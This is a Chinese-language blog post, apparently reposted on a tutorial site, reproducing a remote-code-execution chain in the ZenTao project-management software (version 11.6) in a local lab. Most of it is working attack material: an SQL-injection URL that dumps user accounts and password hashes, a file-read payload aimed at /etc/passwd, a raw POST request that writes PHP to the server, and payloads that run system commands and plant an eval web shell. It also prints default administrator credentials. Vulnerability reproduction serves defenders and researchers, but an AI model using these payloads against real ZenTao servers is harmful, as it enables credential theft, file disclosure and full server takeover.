當(dāng)前位置：首頁 > 编程资源 > 综合教程 >内容正文

综合教程

禅道全版本rce漏洞复现笔记

發(fā)布時(shí)間：2024/8/5 综合教程 49 生活家

生活随笔收集整理的這篇文章主要介紹了禅道全版本rce漏洞复现笔记小編覺得挺不錯(cuò)的,現(xiàn)在分享給大家,幫大家做個(gè)參考.

禪道全版本rce漏洞復(fù)現(xiàn)筆記

漏洞說明

禪道項(xiàng)目管理軟件是一款國產(chǎn)的，基于LGPL協(xié)議，開源免費(fèi)的項(xiàng)目管理軟件，它集產(chǎn)品管理、項(xiàng)目管理、測試管理于一體，同時(shí)還包含了事務(wù)管理、組織管理等諸多功能，是中小型企業(yè)項(xiàng)目管理的首選，基于自主的PHP開發(fā)框架──ZenTaoPHP而成，第三方開發(fā)者或企業(yè)可非常方便的開發(fā)插件或者進(jìn)行定制。
此次發(fā)現(xiàn)的漏洞正是ZenTaoPHP框架中的通用代碼所造成的的，因此禪道幾乎所有的項(xiàng)目都受此漏洞影響。本次漏洞復(fù)現(xiàn)以ZenTaoPMS.11.6版本作為演示

環(huán)境搭建

下載鏈接：https://www.zentao.net/download/80153.html

解壓安裝后訪問禪道主頁 http://127.0.0.1/index.php

查看當(dāng)前版本 http://127.0.0.1:81/zentao/index.php?mode=getconfig

至此環(huán)境搭建成功

漏洞復(fù)現(xiàn)

漏洞1 SQL注入

首先我們登錄admin/CD87691043cs賬戶修改默認(rèn)密碼，創(chuàng)建一個(gè)普通Test0001/1qaz2wsx3edc!@#$用戶并登錄

Payload

http://127.0.0.1/zentao/api-getModel-api-sql-sql=select+account,password+from+zt_user

Poc訪問結(jié)果如下：

漏洞2 文件讀取

Payload

http://127.0.0.1/zentao/api-getModel-file-parseCSV-fileName=/etc/passwd

Poc訪問結(jié)果如下：

由于本地環(huán)境是window系統(tǒng)，所以沒有回顯，我們?cè)趚amppzentaomoduleapi目錄下新建一個(gè)test文件，讀取

http://127.0.0.1/zentao/api-getModel-file-parseCSV-fileName=test

漏洞3 RCE

利用上面的文件讀取來執(zhí)行命令

Payload1

POST /zentao/api-getModel-editor-save-filePath=1111 HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:77.0) Gecko/20100101 Firefox/77.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: lang=zh-cn; device=desktop; theme=default; windowWidth=2426; windowHeight=796; zentaosid=vqruohhgn7qbhveakg04h9e267
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 29

fileContent=<?php phpinfo()?>

先寫入一個(gè)phpinfo，再讀取訪問

需要給物理路徑加上一層才能包含成功

http://127.0.0.1/zentao/api-getModel-api-getMethod-filePath=1111/1

Payload2

fileContent=<?php system('whoami');?>

Payload3(一句話)

fileContent=<?php file_put_contents('E://CMS/ZenTaoPMS/xampp/zentao/www/xxx.php.aaa', '<?php @eval($_REQUEST["x"]);?>');?>

這里是window系統(tǒng)，所以寫入絕對(duì)路徑，絕對(duì)路徑可以同樣用fileContent=<?php getcwd()?>獲取

http://127.0.0.1/zentao/xxx.php.aaa?x=phpinfo();

PS:最好使用linux系統(tǒng)安裝，windows不要使用一鍵安裝包安裝，windows系統(tǒng)安裝集成版的話根目錄下的php代碼好像做了限制，無法執(zhí)行。

參考鏈接

【滲透筆記】禪道

禪道全版本rce漏洞分析

總結(jié)

以上是生活随笔為你收集整理的禅道全版本rce漏洞复现笔记的全部內(nèi)容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯(cuò)，歡迎將生活随笔推薦給好友。

上一篇： iphone引导式访问密码忘记怎么办？
下一篇：怎么创建具有真实纹理的CG场景岩石？